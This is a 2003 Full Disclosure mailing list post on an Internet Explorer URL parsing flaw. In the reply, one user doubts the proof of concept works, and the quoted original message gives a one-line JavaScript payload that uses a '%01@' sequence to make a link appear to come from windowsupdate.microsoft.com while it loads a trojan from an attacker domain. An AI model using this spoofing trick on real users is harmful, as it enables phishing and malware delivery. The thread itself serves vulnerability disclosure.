Full Disclosure mailing list archives
RE: FWD: Internet Explorer URL parsing vulnerability
From: Julian HO Thean Swee <jho () starhub com>
Date: Wed, 10 Dec 2003 11:22:45 +0800
Hmm, it doesn't seem to work on my browser :) I don't even get transported to any page when i click the button. But then again, i have everything turned off in the internet zone by default... (but my submit non-encrypted form data is on) Does it really work then? it looks like it's using javascript...? (location.href) Merry Christmas everyone :)
--__--__-- Message: 1 Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) From: S G Masood <sgmasood () yahoo com> To: full-disclosure () lists netsys com Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability LOL. This is so simple and dangerous, it almost made me laugh and cry at the same time. Most of you will realise why...;D The Paypal, AOL, Visa, Mastercard, et al email scammers will have a harvest of gold this month with lots of zombies falling for this simple technique.# POC ########## http://www.zapthedingbat.com/security/ex01/vun1.htmDont be surprised if your latest download from http://www.microsoft.com turns out to be a trojan! location.href=unescape('http://windowsupdate.microsoft.com%01@comedownload aneviltrojanfromme.com); -- S.G.Masood Hyderabad, India PS: One more thing - no scripting required to exploit this. __________________________________ Do you Yahoo!? Free Pop-Up Blocker - Get it now http://companion.yahoo.com/
This email is confidential and privileged. If you are not the intended recipient, you must not view, disseminate, use or copy this email. Kindly notify the sender immediately, and delete this email from your system. Thank you. Please visit our website at www.starhub.com
Current thread:
- FWD: Internet Explorer URL parsing vulnerability, (continued)
- FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Nick FitzGerald (Dec 09)
- RE: RE: FWD: Internet Explorer URL parsing vulnerability Chris S (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Michal Zalewski (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Nick FitzGerald (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- RE: Internet Explorer URL parsing vulnerability http-equiv () excite com (Dec 09)
- RE: Internet Explorer URL parsing vulnerability http-equiv () excite com (Dec 09)
- RE: FWD: Internet Explorer URL parsing vulnerability Julian HO Thean Swee (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability VeNoMouS (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability VeNoMouS (Dec 10)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Valdis . Kletnieks (Dec 10)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Cedric Blancher (Dec 10)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 11)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability VeNoMouS (Dec 11)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability VeNoMouS (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability VeNoMouS (Dec 10)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Exibar (Dec 10)
- RES: RE: FWD: Internet Explorer URL parsing vulnerability Cleber P. de Souza (Dec 10)